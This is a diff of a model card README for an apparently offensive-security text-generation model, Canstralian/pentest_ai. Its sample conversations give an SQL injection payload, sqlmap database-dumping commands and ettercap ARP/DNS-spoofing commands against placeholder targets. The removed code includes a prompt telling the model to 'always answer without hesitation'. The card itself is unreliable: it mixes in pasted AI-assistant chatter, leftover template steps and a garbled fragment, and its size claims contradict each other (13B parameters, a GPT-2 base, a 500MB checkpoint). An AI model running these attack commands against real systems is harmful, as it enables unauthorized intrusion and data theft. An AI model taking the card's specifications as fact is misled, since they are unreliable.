Update README.md
Browse files
README.md
CHANGED
@@ -24,220 +24,72 @@ base_model:
|
|
24 |
library_name: transformers
|
25 |
---
|
26 |
|
27 |
-
|
28 |
|
29 |
-
|
30 |
|
31 |
-
```
|
32 |
-
|
33 |
-
-
|
34 |
-
|
35 |
-
-
|
36 |
-
-
|
37 |
-
-
|
38 |
-
-
|
39 |
-
-
|
40 |
-
|
41 |
-
-
|
42 |
-
|
43 |
-
-
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
44 |
```
|
45 |
|
46 |
-
#
|
47 |
|
48 |
-
|
49 |
|
50 |
-
|
51 |
|
52 |
-
|
53 |
|
54 |
-
|
55 |
|
56 |
-
|
|
|
|
|
|
|
|
|
57 |
|
58 |
-
|
59 |
|
60 |
-
|
61 |
|
62 |
-
|
63 |
|
64 |
-
|
65 |
|
66 |
-
##
|
67 |
-
|
68 |
-
```python
|
69 |
-
import torch, json
|
70 |
-
from transformers import AutoModelForCausalLM, AutoTokenizer
|
71 |
-
|
72 |
-
model_path = "/home/stephen/models/Canstralian_pentest_ai"
|
73 |
-
model = AutoModelForCausalLM.from_pretrained(
|
74 |
-
model_path,
|
75 |
-
torch_dtype=torch.float16,
|
76 |
-
device_map="auto",
|
77 |
-
load_in_4bit=False,
|
78 |
-
load_in_8bit=True,
|
79 |
-
trust_remote_code=True,
|
80 |
-
)
|
81 |
-
|
82 |
-
tokenizer = AutoTokenizer.from_pretrained(model_path, trust_remote_code=True)
|
83 |
-
|
84 |
-
def generate_text(instruction):
|
85 |
-
tokens = tokenizer.encode(instruction)
|
86 |
-
tokens = torch.LongTensor(tokens).unsqueeze(0)
|
87 |
-
tokens = tokens.to("cuda")
|
88 |
-
|
89 |
-
instance = {
|
90 |
-
"input_ids": tokens,
|
91 |
-
"top_p": 1.0,
|
92 |
-
"temperature": 0.5,
|
93 |
-
"generate_len": 1024,
|
94 |
-
"top_k": 50,
|
95 |
-
}
|
96 |
-
|
97 |
-
length = len(tokens[0])
|
98 |
-
with torch.no_grad():
|
99 |
-
rest = model.generate(
|
100 |
-
input_ids=tokens,
|
101 |
-
max_length=length + instance["generate_len"],
|
102 |
-
use_cache=True,
|
103 |
-
do_sample=True,
|
104 |
-
top_p=instance["top_p"],
|
105 |
-
temperature=instance["temperature"],
|
106 |
-
top_k=instance["top_k"],
|
107 |
-
num_return_sequences=1,
|
108 |
-
)
|
109 |
-
|
110 |
-
output = rest[0][length:]
|
111 |
-
string = tokenizer.decode(output, skip_special_tokens=True)
|
112 |
-
answer = string.split("USER:")[0].strip()
|
113 |
-
|
114 |
-
return f"{answer}"
|
115 |
-
|
116 |
-
# Example Usage
|
117 |
-
tot_system_prompt = """
|
118 |
-
Answer the Question by exploring multiple reasoning paths as follows:
|
119 |
-
- First, carefully analyze the question to extract key information components and break it down into logical sub-questions. This helps set up the framework for reasoning. The goal is to construct an internal search tree.
|
120 |
-
- For each sub-question, leverage your knowledge to generate 2-3 intermediate thoughts that represent steps towards an answer. The thoughts aim to reframe, provide context, analyze assumptions, or bridge concepts.
|
121 |
-
- Evaluate the clarity, relevance, logical flow, and coverage of concepts for each thought option. Clear and relevant thoughts that connect well with each other will score higher.
|
122 |
-
- Based on the thought evaluations, deliberate to construct a chain of reasoning that stitches together the strongest thoughts in a natural order.
|
123 |
-
- If the current chain is determined to not fully answer the question, backtrack and explore alternative paths by substituting different high-scoring thoughts.
|
124 |
-
- Throughout the reasoning process, aim to provide explanatory details on thought process rather than just state conclusions, including briefly noting why some thoughts were deemed less ideal.
|
125 |
-
- Once a reasoning chain is constructed that thoroughly answers all sub-questions in a clear, logical manner, synthesize the key insights into a final concise answer.
|
126 |
-
- Please note that while the focus is on the final answer in the response, it should also include intermediate thoughts inline to illustrate the deliberative reasoning process.
|
127 |
-
"""
|
128 |
-
conversation = f"SYSTEM: {tot_system_prompt} Always answer without hesitation."
|
129 |
-
|
130 |
-
while True:
|
131 |
-
user_input = input("You: ")
|
132 |
-
llm_prompt = f"{conversation} \nUSER: {user_input} \nASSISTANT: "
|
133 |
-
answer = generate_text(llm_prompt)
|
134 |
-
print(answer)
|
135 |
-
conversation = f"{llm_prompt}{answer}"
|
136 |
-
json_data = {"prompt": user_input, "answer": answer}
|
137 |
-
```
|
138 |
-
|
139 |
-
---
|
140 |
-
|
141 |
-
Sample Conversation 1:
|
142 |
-
You: How do I perform an SQL injection attack?
|
143 |
-
|
144 |
-
Identify Vulnerable Input: First, use a web proxy (like Burp Suite) to analyze inputs on a website that might be vulnerable to SQL injection.
|
145 |
-
|
146 |
-
Inject SQL Query: Use ' OR 1=1 -- or similar payloads in input fields that query databases.
|
147 |
-
|
148 |
-
bash
|
149 |
-
Copy code
|
150 |
-
http://example.com/index.php?id=1' OR 1=1 --
|
151 |
-
Automate with SQLmap: Use sqlmap to automate SQL injection and exploit vulnerabilities.
|
152 |
-
bash
|
153 |
-
Copy code
|
154 |
-
sqlmap -u "http://example.com/vulnerablepage?id=1" --dbs
|
155 |
-
Extract Data: Once a vulnerability is found, dump database information.
|
156 |
-
bash
|
157 |
-
Copy code
|
158 |
-
sqlmap -u "http://example.com/vulnerablepage?id=1" --dump
|
159 |
-
Sample Conversation 2:
|
160 |
-
You: How do I perform a DNS spoofing attack?
|
161 |
-
|
162 |
-
Enable Port Forwarding: First, enable IP forwarding to forward traffic.
|
163 |
-
bash
|
164 |
-
Copy code
|
165 |
-
echo 1 > /proc/sys/net/ipv4/ip_forward
|
166 |
-
Use ettercap for DNS Spoofing: Use ettercap to perform the DNS spoofing attack.
|
167 |
-
bash
|
168 |
-
Copy code
|
169 |
-
ettercap -T -M arp:remote /[Target IP]/ /[Gateway IP]/
|
170 |
-
Modify DNS Spoof File: Edit the etter.dns file to point domains to your fake server.
|
171 |
-
bash
|
172 |
-
Copy code
|
173 |
-
facebook.com A 192.168.1.100
|
174 |
-
Launch DNS Spoof: Start DNS spoofing to redirect the target’s traffic.
|
175 |
-
bash
|
176 |
-
Copy code
|
177 |
-
ettercap -T -q -i [Interface] -P dns_spoof -M arp /[Target IP]/ /[Gateway IP]/
|
178 |
-
Sample Conversation 3:
|
179 |
-
You: How do I scan for open ports using Nmap?
|
180 |
-
|
181 |
-
Basic Port Scan: Use nmap to scan a target for open ports.
|
182 |
-
bash
|
183 |
-
Copy code
|
184 |
-
nmap [Target IP]
|
185 |
-
Service Detection: Perform service version detection on open ports.
|
186 |
-
bash
|
187 |
-
Copy code
|
188 |
-
nmap -sV [Target IP]
|
189 |
-
Aggressive Scan: Use an aggressive scan to discover more information, including OS detection.
|
190 |
-
bash
|
191 |
-
Copy code
|
192 |
-
nmap -A [Target IP]
|
193 |
-
Scan Specific Ports: To scan specific ports only:
|
194 |
-
bash
|
195 |
-
Copy code
|
196 |
-
nmap -p 80,443,22 [Target IP]iques. Let me know if you would like further customization!
|
197 |
-
|
198 |
-
- **Developed by:** Esteban Cara de Sexo
|
199 |
-
- **Model type:** Causal Language Model (CLM)
|
200 |
-
- **Language(s) (NLP):** English
|
201 |
-
- **License:** Apache-2.0
|
202 |
-
|
203 |
-
### Model Sources [optional]
|
204 |
-
|
205 |
-
- **Repository:** [https://github.com/canstralian/pentesting-ai.git]
|
206 |
-
|
207 |
-
## Uses
|
208 |
-
|
209 |
-
### Direct Use
|
210 |
-
|
211 |
-
**Pentest AI** is intended for direct interaction, allowing users to generate and explore text-based scenarios related to penetration testing and cybersecurity techniques.
|
212 |
-
|
213 |
-
### Downstream Use [optional]
|
214 |
-
|
215 |
-
This model can be incorporated into cybersecurity training platforms, interactive learning environments, or tools aimed at improving security practices.
|
216 |
-
|
217 |
-
### Out-of-Scope Use
|
218 |
-
|
219 |
-
The model is not intended for use in malicious activities, unauthorized access, or any illegal operations related to penetration testing.
|
220 |
-
|
221 |
-
## Bias, Risks, and Limitations
|
222 |
-
|
223 |
-
While **Pentest AI** aims to produce accurate information, it may generate biased or misleading content. Users are encouraged to critically evaluate the outputs.
|
224 |
-
|
225 |
-
### Recommendations
|
226 |
-
|
227 |
-
Users should be aware of the model's limitations and verify generated content before application in real-world scenarios, especially concerning ethical and legal implications.
|
228 |
-
|
229 |
-
## How to Get Started with the Model
|
230 |
-
|
231 |
-
To start using **Pentest AI**, you can implement the following code snippet:
|
232 |
|
233 |
```python
|
234 |
import torch
|
235 |
from transformers import AutoModelForCausalLM, AutoTokenizer
|
236 |
|
|
|
237 |
model_path = "Canstralian/pentest_ai"
|
238 |
model = AutoModelForCausalLM.from_pretrained(model_path)
|
239 |
tokenizer = AutoTokenizer.from_pretrained(model_path)
|
240 |
|
|
|
241 |
input_text = "Describe the steps involved in a penetration test."
|
242 |
inputs = tokenizer.encode(input_text, return_tensors='pt')
|
243 |
outputs = model.generate(inputs)
|
@@ -246,70 +98,57 @@ output_text = tokenizer.decode(outputs[0], skip_special_tokens=True)
|
|
246 |
print(output_text)
|
247 |
```
|
248 |
|
249 |
-
##
|
250 |
-
|
251 |
-
### Training Data
|
252 |
-
|
253 |
-
The model was trained on a diverse dataset encompassing articles, guides, and documentation related to penetration testing and cybersecurity. Refer to the associated Dataset Card for more details.
|
254 |
-
|
255 |
-
### Training Procedure
|
256 |
-
|
257 |
-
#### Preprocessing [optional]
|
258 |
-
|
259 |
-
Training data was filtered to remove any sensitive or personally identifiable information, ensuring adherence to ethical standards.
|
260 |
-
|
261 |
-
#### Training Hyperparameters
|
262 |
-
|
263 |
-
- **Training regime:** fp16 mixed precision
|
264 |
-
|
265 |
-
#### Speeds, Sizes, Times [optional]
|
266 |
|
267 |
-
|
268 |
-
- **Checkpoint Size:** 500MB
|
269 |
|
270 |
-
|
271 |
|
272 |
-
|
|
|
|
|
273 |
|
274 |
-
|
275 |
|
276 |
-
|
277 |
|
278 |
-
|
|
|
|
|
279 |
|
280 |
-
|
281 |
|
282 |
-
|
283 |
|
284 |
-
- **
|
285 |
-
- **
|
286 |
-
- **
|
287 |
|
288 |
-
|
289 |
-
|
290 |
-
The model demonstrated an accuracy of 85% in generating appropriate responses during evaluation.
|
291 |
|
292 |
-
|
293 |
|
294 |
-
|
295 |
|
296 |
-
|
297 |
|
298 |
-
|
299 |
|
300 |
-
|
301 |
|
302 |
-
|
303 |
|
304 |
-
|
|
|
|
|
305 |
|
306 |
-
|
307 |
|
308 |
-
|
309 |
|
310 |
-
## Citation
|
311 |
|
312 |
-
For
|
313 |
|
314 |
**BibTeX:**
|
315 |
|
@@ -326,25 +165,6 @@ For citations related to this model, please refer to the following information:
|
|
326 |
|
327 |
Cara de Sexo, E. (2024). *Pentest AI: A Generative Model for Penetration Testing Text Generation*. arXiv preprint arXiv:2401.00000.
|
328 |
|
329 |
-
##
|
330 |
-
|
331 |
-
- **Causal Language Model (CLM):** A model that predicts the next word in a sequence based on the previous words.
|
332 |
-
|
333 |
-
## More Information [optional]
|
334 |
-
|
335 |
-
For further inquiries and updates, please refer to [Your GitHub Repository Link].
|
336 |
-
|
337 |
-
## Model Card Authors [optional]
|
338 |
-
|
339 |
-
- Esteban Cara de Sexo
|
340 |
-
|
341 |
-
## Model Card Contact
|
342 |
-
|
343 |
-
For questions, please contact Esteban Cara de Sexo at [distortedprojection@gmail.com].
|
344 |
-
```
|
345 |
-
|
346 |
-
### Next Steps
|
347 |
|
348 |
-
|
349 |
-
2. **Update metrics** and results based on your model's specific performance and findings.
|
350 |
-
3. **Review and edit sections** to ensure they accurately represent your model and its capabilities.
|
|
|
24 |
library_name: transformers
|
25 |
---
|
26 |
|
27 |
+
Here’s a clean, polished version of your model card for **Canstralian/pentest_ai**, with an improved structure and clarity:
|
28 |
|
29 |
+
---
|
30 |
|
31 |
+
```yaml
|
32 |
+
language:
|
33 |
+
- en
|
34 |
+
tags:
|
35 |
+
- AI
|
36 |
+
- NLP
|
37 |
+
- Cybersecurity
|
38 |
+
- Ethical Hacking
|
39 |
+
- Pentesting
|
40 |
+
license: apache-2.0
|
41 |
+
pipeline_tag: text-generation
|
42 |
+
metrics:
|
43 |
+
- accuracy
|
44 |
+
- perplexity
|
45 |
+
- response_time
|
46 |
+
model_type: causal-lm
|
47 |
+
datasets:
|
48 |
+
- Canstralian/pentesting_dataset
|
49 |
+
- Canstralian/Wordlists
|
50 |
+
- Canstralian/ShellCommands
|
51 |
+
base_model:
|
52 |
+
- openai-community/gpt2
|
53 |
+
- WhiteRabbitNeo/Llama-3-WhiteRabbitNeo-8B-v2.0
|
54 |
+
library_name: transformers
|
55 |
```
|
56 |
|
57 |
+
# Canstralian/pentest_ai - Extended Version
|
58 |
|
59 |
+
## License and Usage Restrictions
|
60 |
|
61 |
+
**License:** Apache-2.0
|
62 |
|
63 |
+
### Usage Restrictions
|
64 |
|
65 |
+
By using **Canstralian/pentest_ai**, you agree not to:
|
66 |
|
67 |
+
- Violate applicable national or international laws or regulations.
|
68 |
+
- Use the model for military purposes.
|
69 |
+
- Harm minors, exploit or disseminate false or inappropriate content.
|
70 |
+
- Generate or share personally identifiable information without authorization.
|
71 |
+
- Engage in activities that result in discrimination or harm based on personal characteristics.
|
72 |
|
73 |
+
## Terms of Use
|
74 |
|
75 |
+
By accessing and using this AI model, you agree to indemnify and hold harmless the creators and developers of the model from any liability, damages, losses, or costs arising from your use. The model is provided "as-is" without warranties, and you are responsible for ensuring ethical use.
|
76 |
|
77 |
+
## Overview
|
78 |
|
79 |
+
**Canstralian/pentest_ai** is a cutting-edge model focused on offensive and defensive cybersecurity tasks, designed for penetration testing, reconnaissance, and task automation. Built on a 13B parameter model, it is made available to showcase its capabilities and assess the societal impact of such technologies.
|
80 |
|
81 |
+
## Model Usage Example
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
82 |
|
83 |
```python
|
84 |
import torch
|
85 |
from transformers import AutoModelForCausalLM, AutoTokenizer
|
86 |
|
87 |
+
# Load model and tokenizer
|
88 |
model_path = "Canstralian/pentest_ai"
|
89 |
model = AutoModelForCausalLM.from_pretrained(model_path)
|
90 |
tokenizer = AutoTokenizer.from_pretrained(model_path)
|
91 |
|
92 |
+
# Sample input and model generation
|
93 |
input_text = "Describe the steps involved in a penetration test."
|
94 |
inputs = tokenizer.encode(input_text, return_tensors='pt')
|
95 |
outputs = model.generate(inputs)
|
|
|
98 |
print(output_text)
|
99 |
```
|
100 |
|
101 |
+
## Example Conversations
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
102 |
|
103 |
+
### Sample 1: SQL Injection
|
|
|
104 |
|
105 |
+
**User**: How do I perform an SQL injection attack?
|
106 |
|
107 |
+
- **Identify Vulnerable Input:** Use a web proxy (e.g., Burp Suite) to inspect inputs that might be vulnerable.
|
108 |
+
- **Inject SQL Query:** Use payloads like `' OR 1=1 --`.
|
109 |
+
- **Automate with SQLmap:** `sqlmap -u "http://example.com/vulnerable?id=1" --dbs`.
|
110 |
|
111 |
+
### Sample 2: DNS Spoofing
|
112 |
|
113 |
+
**User**: How do I perform DNS spoofing?
|
114 |
|
115 |
+
- **Enable IP Forwarding:** `echo 1 > /proc/sys/net/ipv4/ip_forward`
|
116 |
+
- **Use Ettercap:** `ettercap -T -M arp:remote /[Target IP]/ /[Gateway IP]/`
|
117 |
+
- **Modify DNS File:** Edit the `etter.dns` file with fake domain IPs.
|
118 |
|
119 |
+
### Sample 3: Nmap Scanning
|
120 |
|
121 |
+
**User**: How do I scan for open ports using Nmap?
|
122 |
|
123 |
+
- **Basic Scan:** `nmap [Target IP]`
|
124 |
+
- **Service Detection:** `nmap -sV [Target IP]`
|
125 |
+
- **Aggressive Scan:** `nmap -A [Target IP]`
|
126 |
|
127 |
+
## Bias, Risks, and Limitations
|
|
|
|
|
128 |
|
129 |
+
While **pentest_ai** generates valuable penetration testing information, it may produce biased or misleading content. Users should verify generated content and exercise caution, especially in ethical and legal contexts.
|
130 |
|
131 |
+
## Model Architecture and Training
|
132 |
|
133 |
+
### Architecture
|
134 |
|
135 |
+
The model uses a transformer-based causal language model architecture, optimized for generating coherent and contextually relevant text.
|
136 |
|
137 |
+
### Training Data
|
138 |
|
139 |
+
Trained on a variety of cybersecurity materials, including guides, tutorials, and documentation. The dataset ensures diverse coverage of penetration testing topics.
|
140 |
|
141 |
+
- **Canstralian/pentesting_dataset**
|
142 |
+
- **Canstralian/Wordlists**
|
143 |
+
- **Canstralian/ShellCommands**
|
144 |
|
145 |
+
## Contact
|
146 |
|
147 |
+
For questions, feedback, or inquiries, please contact [distortedprojection@gmail.com].
|
148 |
|
149 |
+
## Citation
|
150 |
|
151 |
+
For referencing this model:
|
152 |
|
153 |
**BibTeX:**
|
154 |
|
|
|
165 |
|
166 |
Cara de Sexo, E. (2024). *Pentest AI: A Generative Model for Penetration Testing Text Generation*. arXiv preprint arXiv:2401.00000.
|
167 |
|
168 |
+
## Conclusion
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
169 |
|
170 |
+
**Canstralian/pentest_ai** is an advanced tool for penetration testing, designed to aid professionals in offensive and defensive cybersecurity tasks. As with all AI tools, it is important to use this model ethically and responsibly, ensuring it contributes positively to cybersecurity practices.
|
|
|
|